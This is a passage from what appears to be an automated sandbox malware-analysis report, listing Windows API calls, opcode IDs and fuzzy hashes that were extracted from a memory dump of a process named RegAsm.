                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                      • GetKeyState.USER32(00000010), ref: 0041210D
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                      • String ID:
                      • API String ID: 3550944819-0
                      • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                      • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                      APIs
                      • wcslen.MSVCRT ref: 0040B1DE
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                      • memcpy.MSVCRT ref: 0040B248
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@$memcpy$mallocwcslen
                      • String ID:
                      • API String ID: 3023356884-0
                      • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                      • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                      APIs
                      • strlen.MSVCRT ref: 0040B0D8
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                      • memcpy.MSVCRT ref: 0040B159
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@$memcpy$mallocstrlen
                      • String ID:
                      • API String ID: 1171893557-0
                      • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                      • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                      APIs
                      • memset.MSVCRT ref: 004144E7
                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                        • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                      • memset.MSVCRT ref: 0041451A
                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                      • String ID:
                      • API String ID: 1127616056-0
                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                      APIs
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                      • malloc.MSVCRT ref: 00417459
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                      • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$??3@malloc
                      • String ID:
                      • API String ID: 4284152360-0
                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                      • RegisterClassW.USER32(?), ref: 00412428
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: HandleModule$ClassCreateRegisterWindow
                      • String ID:
                      • API String ID: 2678498856-0
                      • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                      • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                      APIs
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                      • malloc.MSVCRT ref: 00417407
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                      • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$??3@malloc
                      • String ID:
                      • API String ID: 4284152360-0
                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                      APIs
                      • memset.MSVCRT ref: 0040F673
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                      • strlen.MSVCRT ref: 0040F6A2
                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                      • String ID:
                      • API String ID: 2754987064-0
                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                      APIs
                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                      • GetStockObject.GDI32(00000000), ref: 004143C6
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                      • String ID:
                      • API String ID: 764393265-0
                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                      APIs
                      • memcpy.MSVCRT ref: 004134E0
                      • memcpy.MSVCRT ref: 004134F2
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memcpy$DialogHandleModuleParam
                      • String ID:
                      • API String ID: 1386444988-0
                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: _snwprintfmemcpy
                      • String ID: %2.2X
                      • API String ID: 2789212964-323797159
                      • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                      • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96